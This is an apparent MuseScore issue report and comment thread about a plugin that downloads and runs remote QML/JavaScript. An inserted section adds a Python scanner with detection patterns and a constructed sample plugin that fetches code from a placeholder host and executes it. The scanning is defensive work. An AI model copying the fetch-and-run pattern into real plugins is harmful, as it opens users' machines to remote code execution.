Dangerous remote code loading
Reported version: 3.2
Priority: P0 - Critical
Type: Functional
Frequency: Once
Severity: S2 - Critical
Reproducibility: Always
Status: active
Regression: No
Workaround: No
Look at the plugin code: this plugin does nothing more than load QML/JavaScript code from a remote site and then call an entry function in this code. While the code currently downloaded seems harmless this remote code execution opens up a local MuseScore instance to all sorts of exploits (and why would you need to download code from a remote site instead of deploying it with the plugin file?).
The overall look of the musicalion website makes that whole procedure even more dubious - no impressum, no contact, no DSGVO-required information.
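A static triage check for the pattern the report describes (a QML plugin that fetches QML/JavaScript over the network and then executes it), written here as an added example and not taken from the report or from the plugin; the sample plugin text, the example.invalid URL and the pattern list are constructed for the demonstration.

```python
"""Static triage for remote code-loading patterns in a MuseScore QML plugin.
Added example (not the report's or the plugin's code): it flags constructs
through which QML/JavaScript can fetch and then execute code at runtime."""
import re

# Heuristic patterns, not a QML parser: enough to triage a plugin before use.
RULES = [
    ("remote-component", re.compile(r'Qt\.createComponent\(\s*["\']https?://')),
    ("remote-include",   re.compile(r'Qt\.include\(\s*["\']https?://')),
    ("remote-import",    re.compile(r'^\s*import\s+["\']https?://', re.M)),
    ("xhr-open",         re.compile(r'\.open\(\s*["\'](GET|POST)["\']\s*,\s*["\']?https?://')),
    ("dynamic-qml",      re.compile(r'Qt\.createQmlObject\(')),
    ("eval",             re.compile(r'\beval\s*\(')),
]
FETCH = {"remote-component", "remote-include", "remote-import", "xhr-open"}
RUN = {"dynamic-qml", "eval", "remote-component", "remote-include", "remote-import"}

def scan_qml(text):
    """Return (rule, line_no, source_line) findings, ordered by line."""
    lines = text.splitlines()
    findings = []
    for rule, pat in RULES:
        for m in pat.finditer(text):
            line_no = text.count("\n", 0, m.start()) + 1
            findings.append((rule, line_no, lines[line_no - 1].strip()))
    return sorted(findings, key=lambda f: f[1])

def loads_remote_code(text):
    """True if the plugin both fetches over the network and runs code dynamically."""
    hits = {rule for rule, _, _ in scan_qml(text)}
    return bool(hits & FETCH) and bool(hits & RUN)

# Constructed sample with the shape the report describes: download, then run.
SAMPLE_PLUGIN = """import QtQuick 2.0
import MuseScore 3.0
MuseScore {
    onRun: {
        var xhr = new XMLHttpRequest()
        xhr.open("GET", "https://example.invalid/plugin/get?date=" + Date.now(), false)
        xhr.send()
        var obj = Qt.createQmlObject(xhr.responseText, parent, "remote")
        obj.entry(curScore)
    }
}
"""

if __name__ == "__main__":
    for rule, n, line in scan_qml(SAMPLE_PLUGIN):
        print(f"{rule:16} line {n}: {line}")
    print("remote code loading:", loads_remote_code(SAMPLE_PLUGIN))
```

Run it over a downloaded .qml file before adding the plugin; a hit on both a fetch rule and a run rule means the file's contents are not what will actually execute.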
Comments
There is an Impressum (and even in German): https://www.musicalion.com/de/scores/site/info/imprint
In reply to There is an Impressum (and… by Jojo-Schmitz
Not in my browser window (but I found it in the page source).
Still - extremely dangerous to live-download code.
Scroll down, hover over the footer (works in Edge).
I agree with you on the danger of loading code from the web...
In reply to scroll down, hover over the… by Jojo-Schmitz
This seems very high priority.
Why is this kind of downloading permitted at all in the MS QML repertoire?
The source for that download is at https://www.musicalion.com/ser/muse-score-plugin/get
A plugin only works if you manually add the plugin to begin with, right?
And when you do so, the plugin comes from the Internet?
So for any plugin running it "runs code from Internet"...
Ok, if the plugin doesn't live-download code, it is code that you can review before using it.
But which "normal" user does that?
So aren't all plugins "dangerous code from Internet"?
You can inspect the plugin code prior to installing and running it; you can't with this one. Even if you can now, via that URL above, the code sent from there might change any minute (and already might, depending on the current date, as that is passed as an argument to the server).
In reply to You can inspect the plugin… by Jojo-Schmitz
I repeat, why is network code loading by code supported? Is there no vetting of code linked to on the plugins page? Is a more vetting-intensive path called for?
No, there is no such vetting.
In reply to No, there is no such vetting. by Jojo-Schmitz
Can QML read (other than import) or write files or exfiltrate data to the net?
In reply to This seems very high… by xavierjazz
After someone removed that initial post yesterday the plugin code was added to this site again today. Hmmm.
Seems that the plugin https://musescore.org/en/project/musicalion-upload-manager got removed and reinstated as https://musescore.org/en/project/musicalion-upload-manager-0.
Came up again in https://musescore.org/en/node/295642#comment-952638 ff.